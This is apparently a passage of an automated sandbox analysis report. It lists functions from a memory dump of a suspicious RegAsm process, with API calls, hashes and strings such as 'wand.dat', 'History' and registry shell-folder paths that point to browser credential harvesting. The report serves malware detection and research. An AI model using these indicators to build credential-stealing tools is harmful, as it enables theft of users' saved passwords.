                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                          • API String ID: 3510742995-272990098
                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                          Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                          • memset.MSVCRT ref: 0040C439
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          • memset.MSVCRT ref: 0040C4D0
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$EnumValuememset$Open_wcsuprmemcpywcslen
                                                          • String ID:
                                                          • API String ID: 3312893244-0
                                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                          Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset
                                                          • String ID: gj
                                                          • API String ID: 1297977491-4203073231
                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                          Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                          • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                          Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                          • malloc.MSVCRT ref: 004174BD
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                          • String ID:
                                                          • API String ID: 2903831945-0
                                                          • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                          • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetParent.USER32(?), ref: 0040D453
                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Rect$ClientParentPoints
                                                          • String ID:
                                                          • API String ID: 4247780290-0
                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                          • memset.MSVCRT ref: 004450CD
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                          • String ID:
                                                          • API String ID: 1471605966-0
                                                          • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                          • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wcscpy.MSVCRT ref: 0044475F
                                                          • wcscat.MSVCRT ref: 0044476E
                                                          • wcscat.MSVCRT ref: 0044477F
                                                          • wcscat.MSVCRT ref: 0044478E
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                          • String ID: \StringFileInfo\
                                                          • API String ID: 102104167-2245444037
                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                          Function 0040F508 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$??3@
                                                          • String ID: g4@
                                                          • API String ID: 3314356048-2133833424
                                                          • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                          • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _memicmpwcslen
                                                          • String ID: @@@@$History
                                                          • API String ID: 1872909662-685208920
                                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 004100FB
                                                          • memset.MSVCRT ref: 00410112
                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                          • _snwprintf.MSVCRT ref: 00410141
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                          • String ID: </%s>
                                                          • API String ID: 3400436232-259020660
                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040D58D
                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                          • String ID: caption
                                                          • API String ID: 1523050162-4135340389
                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                          • String ID: MS Sans Serif
                                                          • API String ID: 210187428-168460110
                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memcmp
                                                          • String ID:
                                                          • API String ID: 3384217055-0
                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$memcpy
                                                          • String ID:
                                                          • API String ID: 368790112-0
                                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                          Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                          • memcpy.MSVCRT ref: 0042EC7A
                                                          Strings
                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset
                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                          • API String ID: 1297977491-2063813899
                                                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040560C
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                          • String ID: *.*$dat$wand.dat
                                                          • API String ID: 2618321458-1828844352
                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                          Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                          • wcslen.MSVCRT ref: 00410C74
                                                          • _wtoi.MSVCRT ref: 00410C80
                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                          • String ID:
                                                          • API String ID: 1549203181-0
                                                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00412057
                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                          • String ID:
                                                          • API String ID: 3550944819-0
                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                          Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                          • memcpy.MSVCRT ref: 0040A94F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                          • String ID:
                                                          • API String ID: 3023356884-0
                                                          • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                          • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                          Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
